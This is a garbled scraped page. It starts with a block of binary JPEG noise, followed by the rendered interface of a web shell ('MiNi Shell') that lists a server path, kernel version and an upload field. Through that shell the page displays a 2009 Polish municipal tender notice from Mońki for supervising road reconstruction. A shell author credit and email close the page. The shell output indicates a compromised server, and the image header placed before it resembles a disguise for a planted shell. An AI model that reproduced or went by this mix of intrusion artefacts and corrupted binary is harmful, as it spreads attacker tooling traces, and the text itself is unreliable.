JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/133272-N-2009.html

<p class="kh_header"><b>Mońki: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją projektu pn.: Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej obejmującego przebudowę ulic: Kopernika, Kochanowskiego, Sienkiewicza, Modrzewskiego, Budnika, Herberta, Plater, Reymonta i drogi gminnej Ciesze - do drogi krajowej Nr 65.</b><br>
<b>Numer ogłoszenia: 133272 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mońki , ul. Słowackiego 5A, 19-100 Mońki, woj. podlaskie, tel. 085 7162587, faks 085 7162587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.monki.um.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją projektu pn.: Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej obejmującego przebudowę ulic: Kopernika, Kochanowskiego, Sienkiewicza, Modrzewskiego, Budnika, Herberta, Plater, Reymonta i drogi gminnej Ciesze - do drogi krajowej Nr 65..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją projektu pn.: Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej.

1. Zadanie inwestycyjne obejmuje:
- przebudowę 8 ulic i 1 drogi: ul. Kopernika (Nr 104067B), ul. Kochanowskiego (Nr 104066B), ul. Sienkiewicza (Nr 104064B) wraz z łącznikiem, ul. Modrzewskiego (Nr 104062B), ul. Budnika (Nr 104096B), ul. Herberta (Nr 104099B), ul. Plater (Nr 104071B), ul. Reymonta (Nr 104098B) wraz z łącznikiem, drogę gminną Nr 104045B Ciesze - do drogi krajowej Nr 65 o łącznej długości 3184,8 m i pow. 19108,8 m2,
- wybudowanie chodników i wjazdów bramowych o powierzchni 10016,7 m2,
- wybudowanie kanałów deszczowych i przykanalików o łącznej długości 1 981,6 m wraz  z wpustami i studzienkami deszczowymi.  
Przebudowa polegać będzie na wykonaniu nowej nawierzchni jezdni:
- o szerokości 6,0 m z kostki betonowej POLBRUK na ul. Kopernika, Kochanowskiego, Modrzewskiego, Reymonta; 
- o szerokości 5,0 m z kostki betonowej POLBRUK na ul. Herberta i Plater,
- o szerokości 5,5 m z kostki betonowej POLBRUK na sięgaczu przy ul. Reymonta,
- o szerokości 6,0 m z betonu asfaltowego na ulicy Sienkiewicza i Budnika oraz na drodze gminnej Ciesze.
Na ulicach po obu stronach jezdni zostaną wykonane chodniki z płytek chodnikowych 35x35x5 i kostki brukowej szarej gr. 6 cm. oraz wjazdy bramowe z kostki brukowej kolorowej o gr. 8 cm. Między ulicami Kopernika i Modrzewskiego będą wykonane dwa ciągi piesze. 
Wzdłuż drogi gminnej po obu stronach wykonane zostaną pobocza żwirowe o szerokości 1,5 m o łącznej długości 2098,0 mb. oraz będą pogłębione istniejące bądź też wykonane nowe rowy odwadniające. Na działki przylegające do drogi zostaną wykonane zjazdy gospodarcze.
Przebudowa obejmuje oznakowanie skrzyżowań znakami poziomymi i pionowymi przebudowywanych dróg i ulic: z drogą krajowa 65 - 1 skrzyżowanie; z ulicami powiatowymi: Mickiewicza, Leśną i Kolejową - 3 skrzyżowania.   
Zakres robót obejmuje przebudowę 5 skrzyżowań z drogami gminnymi na Osiedlu Reja i 2 skrzyżowania w rejonie ulic Budnika i Herberta. Wszystkie skrzyżowania zostaną oznakowane znakami pionowymi i poziomymi. 
W ramach projektu należy wybudować w ulicach kanalizację deszczową oraz na ulicy Sienkiewicza przebudować sieć energetyczną, oświetlenia ulicznego oraz częściowo sieć telefoniczną. 
Ze szczegółowym zakresem robót budowlanych można zapoznać się na stronie internetowej Zamawiającego, gdzie jest zamieszczona dokumentacja projektowa do przetargu Dostosowanie dróg gminnych do sieci dróg powiatowych i drogi krajowej oraz w siedzibie Urzędu Miejskiego. 
Zgodnie w wybraną ofertą na realizację robót budowlanych projektu wartość robót budowlanych określono na kwotę 7 180 659,61 zł. zł. brutto ( słownie: siedem milionów sto osiemdziesiąt tysięcy sześćset pięćdziesiąt dziewięć 61/100 ).

2. Zakres rzeczowy nadzoru inwestorskiego, stanowiącego przedmiot postępowania obejmuje:
nadzór inwestorski nad wykonaniem robót budowlanych branży drogowej;  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz telekomunikacyjnych,
Rolę koordynatora dla wszystkich branż pełni inspektor nadzoru branży drogowej.

3. Obowiązki Inspektora Nadzoru:
1)  reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z pozwoleniami na budowę, z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, obowiązującymi przepisami oraz zasadami wiedzy technicznej,
2)  wzięcie udziału w przekazaniu terenu budowy,
3)  informowanie na bieżąco Zamawiającego o przebiegu prac, 
4) wyegzekwowanie od Wykonawcy robót budowlanych zrealizowanie całego zakresu rzeczowego robót budowlanych objętych dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót,
5) nadzór nad jakością wykonywanych robót i kontrola materiałów celem uniknięcia zastosowania materiałów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
6)  sprawdzanie i odbiór robót ulegających zakryciu lub zanikających,
7) wydawanie poleceń i instrukcji wykonawcy robót budowlanych celem prawidłowego i rzetelnego wykonania prac określonych w umowie z Wykonawcą robót,
8) kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów mających znaczenie dla oceny wykonania robót,
9) sprawdzanie i odbiór skończonych elementów robót, podlegających odbiorowi częściowemu,
10) uczestniczenie w próbach i odbiorach technicznych, których obowiązek przeprowadzenia wynika z przepisów szczególnych,
11) wydawanie kierownikom budowy poleceń dotyczących usuwania nieprawidłowości lub zagrożeń,
12) sprawdzanie i odbiór robót objętych odbiorem końcowym,
13) pobyt na terenie realizowanej inwestycji oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności wykonywanych robót budowlanych z przepisami prawa, z umową oraz harmonogramem rzeczowo - finansowym projektu,
14) sprawdzanie obmiarów robót i kosztorysów powykonawczych oraz potwierdzenie wykonywanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
15) sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej,
16) żądanie usunięcia przez Wykonawcę robót budowlanych ujawnionych wad w jakości prac oraz wnioskowanie o potrącenie z wynagrodzeniem wykonawcy kar umownych w przypadku nie usunięcia tych wad,
17) egzekwowanie od wykonawcy przedstawiania na każde żądanie Zamawiającego dokumentów/dowodów dopuszczenia do stosowania materiałów i wyrobów budowlanych,
18) dopilnowanie, ze strony Zamawiającego, przestrzeganie na budowie przepisów bhp,
19) przygotowanie zadani inwestycyjnego do odbioru końcowego w tym sprawdzenie i zatwierdzenia dokumentacji powykonawczej,
20) sprawdzenie faktur Wykonawcy oraz dokumentów załączonych do rozliczenia robót,
21) sporządzenie pełnego rozliczenia finansowego nadzorowanej inwestycji,
22) uczestniczenie w odbiorze pogwarancyjnym oraz przeglądach gwarancyjnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  zamówienie mogą ubiegać się Wykonawcy, którzy:
1)	spełnią warunki określone w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Z 2007 r., Nr 223, poz. 1655 ze zm.)
2)	nie podlegają wykluczeniu z postępowania na podstawie art.24 ust 1 i 2 ustaw z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. Z 2007 r., Nr 223, poz. 1655 ze zm.)
3)	spełnią wymogi specyfikacji istotnych warunków zamówienia
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o dokumenty wymagane w rozdziale VII niniejszej SIWZ metodą spełnia/nie spełnia z zastrzeżeniem art.26 ust.3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na ofertę składają się następujące dokumenty i załączniki: formularz oferty - wypełniony i podpisany przez Wykonawcę wraz z załącznikami (załącznik nr 1 do SIWZ)
2.  W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawo zamówień publicznych składa następujące oświadczenia i dokumenty:
a)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)  oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu  określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  - załącznik nr 2 do SIWZ
3. W celu potwierdzenia spełniania warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
a) stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (inspektorzy nadzoru) posiadają uprawnienia budowlane w specjalnościach:
- drogowej wraz z załączeniem do oferty uprawnień oraz aktualnego na dzień składania ofert zaświadczenia o przynależności do właściwej izby samorządu zawodowego 
- instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych wraz z załączeniem do oferty uprawnień oraz aktualnego na dzień składania ofert zaświadczenia o przynależności do właściwej izby samorządu zawodowego,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych , elektroenergetycznych i wraz z załączeniem do oferty uprawnień oraz aktualnego na dzień składania ofert zaświadczenia o przynależności do właściwej izby samorządu zawodowego,
- telekomunikacyjnej wraz z załączeniem do oferty uprawnień oraz aktualnego na dzień składania ofert zaświadczenia o przynależności do właściwej izby samorządu zawodowego,

b) wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia zgodnie z załączonym wzorem (załącznik nr 3 do SIWZ).

Jeżeli wykazie (załącznik nr 3 do SIWZ) Wykonawca wykazał osoby, którymi będzie dysponował, do wykazu należy dołączyć pisemne zobowiązania innych podmiotów do udostępnienia osób.
Wymagane dokumenty, o których mowa wykonawca przedstawi w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana metodą spełnia/ nie spełnia na podstawie złożonych przez Wykonawców a wymaganych przez Zamawiającego dokumentów lub oświadczeń.   



5. Wykonawca mający siedzibę lub zamieszkały poza terytorium Rzeczpospolitej Polskiej:
a) zamiast dokumentu, o których mowa w rozdziale VII pkt 2 lit. a)  składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale VII pkt 5, zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w rozdziale VII pkt 5.

6.  Wykonawcy wspólnie ubiegający się o zamówienie:
a) ponoszą solidarną odpowiedzialność za wykonanie lub nienależyte wykonanie zamówienia,
b) zobowiązani są do ustanowienia pełnomocnika, ofertę podpisuje pełnomocnik
c) do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarciu umowy,
d) pełnomocnictwo musi mieć formę pisemną, 
e) wszelka korespondencja prowadzona będzie z pełnomocnikiem;
f) jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców,
g) termin na jaki została zawarta umowa regulująca współpracę Wykonawców występujących wspólnie nie może być krótszy od terminu określonego na wykonanie zamówienia wydłużony o okres gwarancji i rękojmi,
h)  oferta winna zawierać dokumenty określone w rozdziale VII pkt 2 lit. a)   dla każdego partnera z osobna; pozostałe dokumenty składane są wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.monki.um.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mońkach, ul. Słowackiego 5a, 19-100 Mońki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 08:45, miejsce: Urząd Miejski w Mońkach, ul. Słowackiego 5a, 19-100 Mońki, pok. 114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com